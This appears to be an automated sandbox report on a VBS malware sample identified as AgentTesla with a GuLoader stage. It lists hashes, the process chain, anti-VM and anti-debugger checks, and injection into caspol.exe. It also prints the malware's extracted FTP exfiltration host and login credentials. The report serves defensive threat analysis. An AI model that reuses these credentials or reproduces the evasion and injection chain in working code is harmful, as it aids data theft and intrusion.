Analysis
- max time kernel: 94s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 07-02-2023 10:39
Static task: static1
Behavioral task: behavioral1 (Sample: file.vbs, Resource: win7-20221111-en)
Behavioral task: behavioral2 (Sample: file.vbs, Resource: win10v2004-20221111-en)
General
- Target: file.vbs
- Size: 258KB
- MD5: d0ba52dbfbe7f83f06f7f769b86262d1
- SHA1: 6f6c3df470839614b343c6b91faef774cbec38b5
- SHA256: f8aaafdae6892d626e0eda0eed6717c1306e3124f32c6827710e57d642b6d851
- SHA512: b26d5599c5f342c6f716fa5c1d7152dead37bde08da1ec238d41bf64e12af08de5867be311a41fcda56b86bd055fb11b154d1cd7c37b544779c6f1f5fef6c6c3
- SSDEEP: 6144:qVfJ51wSP1jYwqeuf5VXTvwRd1umPoDhYFcD5f5PmIY:qVq+BYwwfXrwFoDeF+Y
Malware Config
Extracted: agenttesla
- Protocol: ftp
- Host: ftp://ftp.gammawallish.monster
- Port: 21
- Username: [email protected]
- Password: u?x5-Iko5uqq
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- Checks QEMU agent file (2 TTPs, 2 IoCs)
  Checks presence of QEMU agent, possibly to detect virtualization.
  Processes: powershell.exe, caspol.exe
  description | ioc | process
  File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
  File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | caspol.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: WScript.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | WScript.exe
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  31 | api.ipify.org
  32 | api.ipify.org
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  Processes: caspol.exe
  pid | process
  4428 | caspol.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes: powershell.exe, caspol.exe
  pid | process
  2804 | powershell.exe
  4428 | caspol.exe
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: powershell.exe
  description | pid | process | target process
  PID 2804 set thread context of 4428 | 2804 | powershell.exe | caspol.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (1 IoCs)
  Processes: WerFault.exe
  pid | pid_target | process | target process
  1140 | 4428 | WerFault.exe | caspol.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe
  pid | process
  4764 | powershell.exe
  4764 | powershell.exe
  4308 | powershell.exe
  4308 | powershell.exe
  2804 | powershell.exe
  2804 | powershell.exe
- Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes: powershell.exe
  pid | process
  2804 | powershell.exe
  2804 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, caspol.exe
  description | pid | process
  Token: SeDebugPrivilege | 4764 | powershell.exe
  Token: SeDebugPrivilege | 4308 | powershell.exe
  Token: SeDebugPrivilege | 2804 | powershell.exe
  Token: SeDebugPrivilege | 4428 | caspol.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: WScript.exe, powershell.exe, powershell.exe, powershell.exe
  description | pid | process | target process
  PID 4912 wrote to memory of 4764 | 4912 | WScript.exe | powershell.exe
  PID 4912 wrote to memory of 4764 | 4912 | WScript.exe | powershell.exe
  PID 4764 wrote to memory of 4308 | 4764 | powershell.exe | powershell.exe
  PID 4764 wrote to memory of 4308 | 4764 | powershell.exe | powershell.exe
  PID 4764 wrote to memory of 4308 | 4764 | powershell.exe | powershell.exe
  PID 4308 wrote to memory of 2804 | 4308 | powershell.exe | powershell.exe
  PID 4308 wrote to memory of 2804 | 4308 | powershell.exe | powershell.exe
  PID 4308 wrote to memory of 2804 | 4308 | powershell.exe | powershell.exe
  PID 2804 wrote to memory of 1076 | 2804 | powershell.exe | caspol.exe
  PID 2804 wrote to memory of 1076 | 2804 | powershell.exe | caspol.exe
  PID 2804 wrote to memory of 1076 | 2804 | powershell.exe | caspol.exe
  PID 2804 wrote to memory of 4428 | 2804 | powershell.exe | caspol.exe
  PID 2804 wrote to memory of 4428 | 2804 | powershell.exe | caspol.exe
  PID 2804 wrote to memory of 4428 | 2804 | powershell.exe | caspol.exe
  PID 2804 wrote to memory of 4428 | 2804 | powershell.exe | caspol.exe
Processes
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs" 1⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [inline script argument] 2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
  "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile 3⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [inline script argument] 4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 2188 6⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4428 -ip 4428 1⤵
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
57KB
MD5
548e21a8f5e2c98bf35e935495e36c05
SHA1
39fa41b02e71c3e931c1840ab86606f9529d8398
SHA256
5c626706da5e310c0b96a1fbc0cee8756a9099124e8dab6b9c91ac5090c4cd0d
SHA512
f74e92b83a16a69ce251e2d88cf975eba0db28bc2b88ababeb5d4307f352f1291c02f3e412445c20b45dee801bf8497e2ed1c22a495ab296ca83638dc2c5c479